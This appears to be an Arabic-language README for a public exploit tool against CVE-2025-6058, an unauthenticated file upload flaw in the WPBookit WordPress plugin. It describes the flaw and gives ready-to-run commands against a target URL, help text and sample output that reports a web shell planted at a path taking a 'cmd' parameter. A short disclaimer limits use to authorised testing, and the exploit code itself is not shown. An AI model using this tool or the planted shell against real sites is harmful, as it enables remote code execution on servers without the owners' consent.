
WPBookit <= 1.0.4 - رفع ملفات اعتباطي بدون مصادقة
إضافة WPBookit لـ WordPress عرضة لرفع ملفات تعسفي بسبب عدم التحقق من نوع الملف في دالة image_upload_handle()، والتي تُربط عبر مسار add_booking_type في جميع الإصدارات حتى 1.0.4 وما يتضمنها.
يسمح هذا الخلل للمهاجمين غير المصادقين برفع ملفات تعسفية إلى خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
| CVE | درجة CVSS | نُشر علنًا | آخر تحديث |
|---|---|---|---|
| CVE-2025-6058 | 9.8 (حرجة) | 11 يوليو 2025 | 12 يوليو 2025 |
يقوم هذا الاستغلال بأتمتة:
python3 CVE-2025-6058.py -u http://target.com/wordpress
python3 CVE-2025-6058.py -u http://target.com/wordpress
python CVE-2025-6058.py -help
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
usage: CVE-2025-6058.py [-h] -u URL
CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target URL e.g http(s)://target.com/wordpress
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited
هذه الأداة مقدمة لأغراض تعليمية ولاختبارات الاختراق المصرح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو نشاط غير مصرح به.
استخدمها على مسؤوليتك الخاصة، وتأكد دائمًا من حصولك على إذن لاختبار النظام المستهدف.
بواسطة: Khaled Alenazi (Nxploited)